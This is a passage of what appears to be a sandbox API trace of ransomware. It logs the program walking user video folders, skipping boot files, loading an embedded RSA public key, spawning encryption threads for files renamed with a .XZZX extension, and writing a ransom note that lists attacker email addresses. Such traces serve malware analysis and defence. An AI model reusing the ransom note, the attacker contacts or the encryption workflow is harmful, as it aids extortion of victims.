lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0199.407] SetErrorMode (uMode=0x1) returned 0x1 [0199.407] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0199.407] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.407] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.408] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0199.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0199.408] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0199.408] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0199.408] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.408] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.408] lstrcmpW (lpString1="3B9FB280013C30BC79FE404005721504.XZZX", lpString2="..") returned 1 [0199.408] lstrcmpW (lpString1="3B9FB280013C30BC79FE404005721504.XZZX", lpString2=".") returned 1 [0199.408] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.408] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="ntldr") returned 0x0 [0199.408] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="NTLDR") returned 0x0 [0199.408] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.408] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.408] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0199.408] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") [0199.408] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.408] lstrcpyW (in: lpString1=0x17be7c, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0199.408] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdac [0199.409] Sleep (dwMilliseconds=0x96) [0199.561] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.561] lstrcmpW (lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpString2="..") returned 1 [0199.561] lstrcmpW (lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpString2=".") returned 1 [0199.561] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.561] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="ntldr") returned 0x0 [0199.561] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="NTLDR") returned 0x0 [0199.561] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.561] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.562] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0199.562] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") [0199.562] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.562] lstrcpyW (in: lpString1=0x17be7c, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0199.562] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdb0 [0199.562] Sleep (dwMilliseconds=0x96) [0199.717] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.717] lstrcmpW (lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpString2="..") returned 1 [0199.717] lstrcmpW (lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpString2=".") returned 1 [0199.717] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.717] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="ntldr") returned 0x0 [0199.717] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="NTLDR") returned 0x0 [0199.717] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.717] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.717] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0199.717] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") [0199.717] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.717] lstrcpyW (in: lpString1=0x17be7c, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0199.717] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdb4 [0199.718] Sleep (dwMilliseconds=0x96) [0199.872] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.872] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0199.873] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0199.873] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0199.873] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0199.873] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0199.873] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0199.873] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0199.873] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0199.873] SetErrorMode (uMode=0x1) returned 0x1 [0199.873] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT") returned 70 [0199.873] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0199.873] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0199.873] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xdb8) returned 0x0 [0199.874] RegQueryValueExW (in: hKey=0xdb8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8878, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43b8878*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0199.874] RegCloseKey (hKey=0xdb8) returned 0x0 [0199.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0199.874] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0199.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdb8 [0199.874] CloseHandle (hObject=0xdb8) returned 1 [0199.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0199.874] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0199.874] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0199.874] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0199.874] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0199.874] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.874] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0199.874] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.874] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.874] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.875] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.875] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0199.875] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0199.875] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0199.875] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0199.875] lstrcmpW (lpString1="Z-_06k", lpString2="..") returned 1 [0199.875] lstrcmpW (lpString1="Z-_06k", lpString2=".") returned 1 [0199.875] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0199.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0199.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0199.875] SetErrorMode (uMode=0x1) returned 0x1 [0199.875] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0199.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0199.875] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0199.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0199.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0199.875] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0199.875] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0199.875] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.876] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.876] lstrcmpW (lpString1="37E85546159C2E64B110DA791A0612AC.XZZX", lpString2="..") returned 1 [0199.876] lstrcmpW (lpString1="37E85546159C2E64B110DA791A0612AC.XZZX", lpString2=".") returned 1 [0199.876] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.876] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="ntldr") returned 0x0 [0199.876] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="NTLDR") returned 0x0 [0199.876] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.876] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.876] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0199.876] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") [0199.876] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.876] lstrcpyW (in: lpString1=0x17be7c, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0199.876] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0199.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdc0 [0199.877] Sleep (dwMilliseconds=0x96) [0200.028] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0200.028] lstrcmpW (lpString1="8181DC6820279A95628FB268245D7EDD.XZZX", lpString2="..") returned 1 [0200.028] lstrcmpW (lpString1="8181DC6820279A95628FB268245D7EDD.XZZX", lpString2=".") returned 1 [0200.028] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0200.028] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="ntldr") returned 0x0 [0200.029] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="NTLDR") returned 0x0 [0200.029] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0200.029] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="ntdetect.com") returned 0x0 [0200.029] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0200.029] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") [0200.029] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 